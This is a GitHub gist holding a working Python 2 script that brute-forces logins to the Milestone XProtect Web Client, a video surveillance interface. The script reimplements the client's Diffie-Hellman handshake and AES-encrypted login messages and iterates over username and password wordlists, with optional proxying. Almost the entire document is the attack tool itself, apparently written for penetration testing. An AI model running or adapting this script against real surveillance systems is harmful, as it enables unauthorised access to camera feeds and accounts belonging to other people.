Created
August 13, 2017 18:26
-
-
Save DiabloHorn/0174e699c028be6dd380ab2e3e99fac6 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
""" | |
DiabloHorn - https://diablohorn.com | |
Brute force the Milestone XProtect Web Client interface | |
python xprotect-brute.py http://127.0.0.1:8081/XProtectMobile/Communication --userlist u.txt --pwdlist p.txt --httpproxy http://127.0.0.1:9090 | |
""" | |
import sys | |
import base64 | |
import argparse | |
from random import getrandbits | |
import xml.etree.ElementTree as ET | |
#non standard libraries | |
import requests | |
from Crypto.Cipher import AES | |
from Padding import removePadding, appendPadding | |
PRIMES = {1024:'F488FD584E49DBCD20B49DE49107366B336C380D451D0F7C88B31C7C5B2D8EF6F3C923C043F0A55B188D8EBB558CB85D38D334FD7C175743A31D186CDE33212CB52AFF3CE1B1294018118D7C84A70A72D686C40319C807297ACA950CD9969FABD00A509B0246D3083D66A45D419F9C7CBD894B221926BAABA25EC355E92F78C7',2048:'87A8E61DB4B6663CFFBBD19C651959998CEEF608660DD0F25D2CEED4435E3B00E00DF8F1D61957D4FAF7DF4561B2AA3016C3D91134096FAA3BF4296D830E9A7C209E0C6497517ABD5A8A9D306BCF67ED91F9E6725B4758C022E0B1EF4275BF7B6C5BFC11D45F9088B941F54EB1E59BB8BC39A0BF12307F5C4FDB70C581B23F76B63ACAE1CAA6B7902D52526735488A0EF13C6D9A51BFA4AB3AD8347796524D8EF6A167B5A41825D967E144E5140564251CCACB83E6B486F6B3CA3F7971506026C0B857F689962856DED4010ABD0BE621C3A3960A54E710C375F26375D7014103A4B54330C198AF126116D2276E11715F693877FAD7EF09CADB094AE91E1A1597'} | |
def pack_bigint(i): | |
#https://stackoverflow.com/a/14764681 | |
b = bytearray() | |
while i: | |
b.append(i & 0xFF) | |
i >>= 8 | |
return b | |
def unpack_bigint(b): | |
#https://stackoverflow.com/a/14764681 | |
b = bytearray(b) # in case you're passing in a bytes/str | |
return sum((1 << (bi*8)) * bb for (bi, bb) in enumerate(b)) | |
def genprivkey(): | |
return getrandbits(160) | |
def genpubkey(g,prkey,prime): | |
pubkey = pow(g, prkey, prime) | |
packedpubkey = pack_bigint(pubkey) | |
return base64.b64encode(bytes(packedpubkey)) | |
def gensharedkey(rpubkey, privkey, prime): | |
decrkey = base64.b64decode(rpubkey) | |
rkey = unpack_bigint(decrkey) | |
sharedkey = pow(rkey,privkey,prime) | |
return sharedkey | |
class Xprotect: | |
def __init__(self, targeturl): | |
self.targeturl = targeturl | |
self.prime = long(PRIMES[1024],16) | |
def set_http_proxy(self,proxy): | |
self.proxy = proxy | |
def _first_request(self): | |
req1 = """<?xml version="1.0" encoding="utf-8"?><Communication xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><Command SequenceId="1"><Type>Request</Type><Name>Connect</Name><InputParams><Param Name="PublicKey" Value="Q93/xlw7AsQ55FDAVqle1eIIhG63PRERB+4p509ASN1tOkIbnffeiiSAlccxTm4tIdkxGMwEuBFxP0m4I7a8SgYDYLogVeIqKajPeQg+HgBWAa8znYO0CKYamJzhjoDxiW3XWotKqLPVmHtpcME3KKv4k7Jwk4vq92tGtu/SMUcA" /><Param Name="PrimeLength" Value="1024" /><Param Name="EncryptionPadding" Value="ISO10126" /></InputParams></Command></Communication>""" | |
root = ET.fromstring(req1) | |
for child in root.iter(): | |
if child.tag == 'Param': | |
if child.attrib['Name'] == 'PublicKey': | |
child.set('Value',self.pubkey) | |
xmlmessage = ET.tostring(root,encoding="us-ascii", method="xml") | |
if self.proxy: | |
return requests.post(self.targeturl, headers={'Content-Type':'text/xml; charset=utf-8'}, data=xmlmessage,proxies={'http':self.proxy}) | |
return requests.post(self.targeturl, headers={'Content-Type':'text/xml; charset=utf-8'}, data=xmlmessage) | |
def _extract_items_first_response(self, data): | |
respitems = dict() | |
root = ET.fromstring(data) | |
for child in root.iter(): | |
if child.tag == 'Param': | |
if child.attrib['Name'] == 'ConnectionId': | |
respitems['conid'] = child.attrib['Value'] | |
if child.attrib['Name'] == 'PublicKey': | |
respitems['pubkey'] = child.attrib['Value'] | |
return respitems | |
def _second_request(self,connection_id,encrypted_user,encrypted_pwd): | |
req2 = """<?xml version="1.0" encoding="utf-8"?><Communication xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><ConnectionId>3c6f87e3-88e7-45d3-97e5-d7f5d32fb901</ConnectionId ><Command SequenceId="2"><Type>Request</Type><Name>LogIn</Name><InputParams><Param Name="Username" Value="cqru16DJMngTs3JxA9delw==" /><Param Name="Password" Value="jByQdG9xzuyROPuYIhnQKg==" /><Param Name="NumChallenges" Value="100" /><Param Name="SupportsResampling" Value="Yes" /><Param Name="SupportsExtendedResamplingFactor" Value="Yes" /><Param Name="ClientType" Value="WebClient" /></InputParams></Command></Communication>""" | |
root = ET.fromstring(req2) | |
for child in root.iter(): | |
if child.tag == 'ConnectionId': | |
child.text = connection_id | |
if child.tag == 'Param': | |
if child.attrib['Name'] == 'Username': | |
child.set('Value',encrypted_user) | |
if child.attrib['Name'] == 'Password': | |
child.set('Value',encrypted_pwd) | |
xmlmessage = ET.tostring(root,encoding="us-ascii", method="xml") | |
if self.proxy: | |
return requests.post(self.targeturl, headers={'Content-Type':'text/xml; charset=utf-8'}, data=xmlmessage,proxies={'http':self.proxy}) | |
return requests.post(self.targeturl, headers={'Content-Type':'text/xml; charset=utf-8'}, data=xmlmessage) | |
def encrypt(self, data): | |
mykey = pack_bigint(self.sharedkey) | |
aesiv = mykey[0:16] | |
aeskey = mykey[16:48] | |
cipher = AES.new(bytes(aeskey), AES.MODE_CBC, bytes(aesiv)) | |
paddeddata = appendPadding(data,16,'Random') | |
return base64.b64encode(cipher.encrypt(paddeddata)) | |
def login(self, user, pwd): | |
self.privkey = genprivkey() | |
self.pubkey = genpubkey(2,self.privkey,self.prime) | |
first_response = self._first_request() | |
second_request_items = self._extract_items_first_response(first_response.text) | |
self.sharedkey = gensharedkey(second_request_items['pubkey'],self.privkey,self.prime) | |
encuser = self.encrypt(user) | |
encpwd = self.encrypt(pwd) | |
second_response = self._second_request(second_request_items['conid'],encuser,encpwd) | |
if '<Result>OK</Result>' in second_response.text: | |
return True | |
return False | |
if __name__ == "__main__": | |
parser = argparse.ArgumentParser(description='Brute force Milestone XProtect',epilog='URL looks similar to http://127.0.0.1:8081/XProtectMobile/Communication') | |
parser.add_argument('targeturl',help='target url where the form points to') | |
parser.add_argument('--userlist',required=True,help='list with usernames to try, one per line') | |
parser.add_argument('--pwdlist',required=True,help='list with passwords to try, one per line') | |
parser.add_argument('--httpproxy',help='proxy to tunnel requests through') | |
myargs = parser.parse_args() | |
xp = Xprotect(myargs.targeturl) | |
if myargs.httpproxy: | |
xp.set_http_proxy(myargs.httpproxy) | |
with open(myargs.userlist,'r') as userfile: | |
for user in userfile: | |
with open(myargs.pwdlist,'r') as pwdfile: | |
for pwd in pwdfile: | |
if xp.login(user.strip(),pwd.strip()): | |
print 'user: %s pwd: %s' % (user.strip(),pwd.strip()) | |
else: | |
print 'failed user: %s pwd: %s' % (user.strip(),pwd.strip()) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment